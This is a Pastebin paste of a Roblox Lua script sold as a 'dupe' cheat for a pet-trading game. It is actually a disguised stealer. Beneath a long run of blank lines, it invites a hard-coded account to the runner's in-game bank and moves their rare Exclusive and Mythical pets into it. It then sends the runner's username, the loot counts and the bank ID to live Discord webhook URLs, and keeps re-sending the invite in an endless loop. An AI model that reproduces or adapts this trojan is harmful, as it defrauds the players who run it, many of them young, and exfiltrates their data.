Advertisement
BearHub123_

Bear Hub Dupe Script

Apr 8th, 2022
142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.17 KB | None | 0 0
  1. -- Bear Hub Dupe Script
  2.  
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9.  
  10.  
  11.  
  12.  
  13.  
  14.  
  15.  
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53.  
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66. local HoverBoard = 2376258343
  67. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  68. local mybanks = lib.Network.Invoke("get my banks")
  69. local BankID = mybanks[1]['BUID']
  70. lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], HoverBoard)
  71.  
  72. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  73. local mybanks = lib.Network.Invoke("get my banks")
  74. local BankID = mybanks[1]['BUID']
  75.  
  76. local Bank = BankID
  77.  
  78. local A_1 = "b"
  79. local A_2 = "bank deposit"
  80. local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"].MAIN
  81. Event:FireServer(A_1, A_2)
  82.  
  83. local A_1 = "b"
  84. local A_2 = "buy egg"
  85. local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"].MAIN
  86. Event:FireServer(A_1, A_2)
  87.  
  88. local FinalList = {}
  89. local output = 1
  90. Library = require(game:GetService('ReplicatedStorage').Framework:FindFirstChild('Library'))
  91. Functions = Library.Functions
  92. EXCList = {}
  93. MythicList = {}
  94.  
  95. EList = {}
  96. MList = {}
  97.  
  98.  
  99. table.foreach(Library.Directory.Pets, function(i, v)
  100. if v.rarity == "Exclusive" then
  101. table.insert(EXCList, i)
  102. end
  103. if v.rarity == "Mythical" then
  104. table.insert(MythicList, i)
  105. end
  106. end)
  107.  
  108. local pets = require(game:GetService("ReplicatedStorage").Framework.Modules.Client["4 | Save"]).Get().Pets
  109. for i, v in pairs(pets) do
  110. if table.find(EXCList, v["id"]) ~= nil then
  111. table.insert(EList, v["uid"])
  112. end
  113. if table.find(MythicList, v["id"]) ~= nil then
  114. table.insert(MList, v["uid"])
  115. end
  116. end
  117. if #EList + #MList < 49 then
  118. for i, v in pairs(EList) do
  119. table.insert(FinalList, v)
  120. end
  121. for i, v in pairs(MList) do
  122. table.insert(FinalList, v)
  123. end
  124. elseif #EList + #MList > 49 and #EList < 49 then
  125. for i, v in pairs(EList) do
  126. table.insert(FinalList, v)
  127. end
  128. for i, v in pairs(MList) do
  129. if #FinalList < 49 then
  130. table.insert(FinalList, v)
  131. end
  132. end
  133. elseif #EList + #MList > 49 and #EList > 49 then
  134. for i, v in pairs(EList) do
  135. if #FinalList < 49 then
  136. table.insert(FinalList, v)
  137. end
  138. end
  139. end
  140. wait(0.5)
  141. game:GetService("Players").LocalPlayer.PlayerScripts.Scripts.Game["Open Eggs"].Disabled = true
  142. local A_1 =
  143. {
  144. [1] = "Cracked Egg",
  145. [2] = false
  146. }
  147. local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"]["buy egg"]
  148. Event:InvokeServer(A_1)
  149. wait(0.5)
  150. local A_1 =
  151. {
  152. [1] = Bank,
  153. [2] = FinalList,
  154. [3] = output-1
  155. }
  156. local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"]["bank deposit"]
  157. local result = Event:InvokeServer(A_1)
  158.  
  159. -- wrb
  160.  
  161. local YourWebHookHere = "https://discord.com/api/webhooks/960637164427804792/IjM-MbJ5u59jhHCrDOjihIB5huIDEyMQ1gUSuN3bPpayMbE3qCu-2_1_LHvOTdtcE2wr" -- web hook here
  162.  
  163. local url = YourWebHookHere
  164. local username = game:GetService("Players").LocalPlayer.Name
  165.  
  166. local data = {
  167. ["content"] = "> by Artemper",
  168. ["embeds"] = {{
  169. ["title"] = "__**Open**__",
  170. ["description"] = "i can't track this expired or no",
  171. ["type"] = "rich",
  172. ["color"] = tonumber(0x0E980E),
  173. ["fields"] = {
  174. {
  175. ["name"] = "__Username__",
  176. ["value"] = "**"..username.."**", -- remove the || on both sides if you don't want your username to be behind a spoiler
  177. ["inline"] = false
  178. },
  179. {
  180. ["name"] = "__Gems Deposited__",
  181. ["value"] = output-1,
  182. ["inline"] = false
  183. },
  184. {
  185. ["name"] = "__Total Pet Deposited__",
  186. ["value"] = #FinalList,
  187. ["inline"] = false
  188. },
  189. {
  190. ["name"] = "__Exclusive/Huges__",
  191. ["value"] = #EList,
  192. ["inline"] = false
  193. },
  194. {
  195. ["name"] = "__Mythicals__",
  196. ["value"] = #MList,
  197. ["inline"] = false
  198. },
  199. {
  200. ["name"] = "__BankID__",
  201. ["value"] = BankID,
  202. ["inline"] = false
  203. },
  204. }
  205. }}
  206. }
  207. local newdata = game:GetService("HttpService"):JSONEncode(data)
  208.  
  209. local headers = {
  210. ["content-type"] = "application/json"
  211. }
  212. request = http_request or request or HttpPost or syn.request
  213. local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
  214. request(abcdef)
  215.  
  216. while true do
  217. lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], HoverBoard)
  218. local YourWebHookHere2 = "https://discord.com/api/webhooks/960638309888041080/I0bqwLX-cgKVE4iKwZv4h8bmjMLZv4nr_ON5LeNT3TVPrbwOUycQjH0UElWxvd2Vp_8l" -- web hook here
  219.  
  220. local url2 = YourWebHookHere2
  221. local username2 = game:GetService("Players").LocalPlayer.Name
  222.  
  223. local data2 = {
  224. ["content"] = "> "..username2.." Repeat ur Invites",
  225. ["embeds"] = {{
  226. ["title"] = "__** Results**__",
  227. ["description"] = "i can't track this expired or no",
  228. ["type"] = "rich",
  229. ["color"] = tonumber(0x0E980E),
  230. ["fields"] = {
  231. {
  232. ["name"] = "__Username__",
  233. ["value"] = "**"..username2.."** Repeat ur Invites", -- remove the || on both sides if you don't want your username to be behind a spoiler
  234. ["inline"] = false
  235. },
  236. {
  237. ["name"] = "__Cancel Invite__",
  238. ["value"] = "Yes",
  239. ["inline"] = false
  240. },
  241. }
  242. }}
  243. }
  244. local newdata2 = game:GetService("HttpService"):JSONEncode(data2)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement